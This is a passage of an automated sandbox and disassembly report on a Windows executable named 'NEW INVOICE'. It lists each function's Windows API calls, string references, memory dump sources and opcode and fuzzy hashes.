                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                    • CloseClipboard.USER32 ref: 0046C65D
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                    • CloseClipboard.USER32 ref: 0046C692
                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                    • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                    • CloseClipboard.USER32 ref: 0046C866
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                    • String ID: HH
                                                                                    • API String ID: 589737431-2761332787
                                                                                    • Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                    • Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
                                                                                    • Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
                                                                                    • Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 00456692
                                                                                    • GetDesktopWindow.USER32 ref: 004566AA
                                                                                    • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                    • DestroyWindow.USER32(?), ref: 00456731
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                    • IsWindowVisible.USER32(?), ref: 00456812
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                    • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                    • GetMonitorInfoW.USER32 ref: 00456894
                                                                                    • CopyRect.USER32(?,?), ref: 004568A8
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                    • String ID: ($,$tooltips_class32
                                                                                    • API String ID: 541082891-3320066284
                                                                                    • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                    • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                    • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                    • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 00454DCF
                                                                                    • _wcslen.LIBCMT ref: 00454DE2
                                                                                    • __wcsicoll.LIBCMT ref: 00454DEF
                                                                                    • _wcslen.LIBCMT ref: 00454E04
                                                                                    • __wcsicoll.LIBCMT ref: 00454E11
                                                                                    • _wcslen.LIBCMT ref: 00454E24
                                                                                    • __wcsicoll.LIBCMT ref: 00454E31
                                                                                      • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
                                                                                    • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
                                                                                    • LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00454F37
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
                                                                                    • DestroyIcon.USER32(?), ref: 00454FA2
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 2511167534-1154884017
                                                                                    • Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                    • Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
                                                                                    • Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
                                                                                    • Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
                                                                                    • _wcslen.LIBCMT ref: 00436B79
                                                                                    • _wcscpy.LIBCMT ref: 00436B9F
                                                                                    • _wcscat.LIBCMT ref: 00436BC0
                                                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
                                                                                    • _wcscat.LIBCMT ref: 00436C2A
                                                                                    • _wcscat.LIBCMT ref: 00436C31
                                                                                    • __wcsicoll.LIBCMT ref: 00436C4B
                                                                                    • _wcsncpy.LIBCMT ref: 00436C62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 1503153545-1459072770
                                                                                    • Opcode ID: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                                    • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                    • Opcode Fuzzy Hash: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                                    • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                    APIs
                                                                                      • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                    • _fseek.LIBCMT ref: 004527FC
                                                                                    • __wsplitpath.LIBCMT ref: 0045285C
                                                                                    • _wcscpy.LIBCMT ref: 00452871
                                                                                    • _wcscat.LIBCMT ref: 00452886
                                                                                    • __wsplitpath.LIBCMT ref: 004528B0
                                                                                    • _wcscat.LIBCMT ref: 004528C8
                                                                                    • _wcscat.LIBCMT ref: 004528DD
                                                                                    • __fread_nolock.LIBCMT ref: 00452914
                                                                                    • __fread_nolock.LIBCMT ref: 00452925
                                                                                    • __fread_nolock.LIBCMT ref: 00452944
                                                                                    • __fread_nolock.LIBCMT ref: 00452955
                                                                                    • __fread_nolock.LIBCMT ref: 00452976
                                                                                    • __fread_nolock.LIBCMT ref: 00452987
                                                                                    • __fread_nolock.LIBCMT ref: 00452998
                                                                                    • __fread_nolock.LIBCMT ref: 004529A9
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                      • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                      • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                    • __fread_nolock.LIBCMT ref: 00452A39
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                    • String ID:
                                                                                    • API String ID: 2054058615-0
                                                                                    • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                    • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                    • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                    • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 0
                                                                                    • API String ID: 0-4108050209
                                                                                    • Opcode ID: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                                                                                    • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                                    • Opcode Fuzzy Hash: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                                                                                    • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                                    APIs
                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                    • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                    • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                    • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                    • GetClientRect.USER32(?,?), ref: 00470371
                                                                                    • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 867697134-248962490
                                                                                    • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                    • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                                    • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                                    • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window
                                                                                    • String ID: 0
                                                                                    • API String ID: 2353593579-4108050209
                                                                                    • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                    • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                                    • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                                    • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                                    APIs
                                                                                    • GetSysColor.USER32 ref: 0044A11D
                                                                                    • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                    • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                    • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                    • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                    • GetWindowDC.USER32 ref: 0044A277
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                    • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                    • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                    • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                    • String ID:
                                                                                    • API String ID: 1744303182-0
                                                                                    • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                    • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                                    • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                                    • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                    • API String ID: 790654849-1810252412
                                                                                    • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                    • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                                    • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                                    • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                    • API String ID: 0-1896584978
                                                                                    • Opcode ID: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                    • Instruction ID: e6fbcda15cb9520e0e34bfac0f9750edaedb1b44b840e2dcfb1a2c219c195b9a
                                                                                    • Opcode Fuzzy Hash: 044f2c4ecf877d2b2fc48157703a0e30c53185d3f7c6c17f150f9ffb4993ef22
                                                                                    • Instruction Fuzzy Hash: 907186B2504300ABC720EB65C885FEBB3E8AF94714F148D1FF58997142E679E648C75A
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1927566239-0
                                                                                    • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                    • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                    • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                    • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                    APIs
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                    • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                    • IsWindow.USER32(?), ref: 0046DBDE
                                                                                    • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                    • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                    • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                      • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                                    • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                    • API String ID: 1322021666-1919597938
                                                                                    • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                    • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
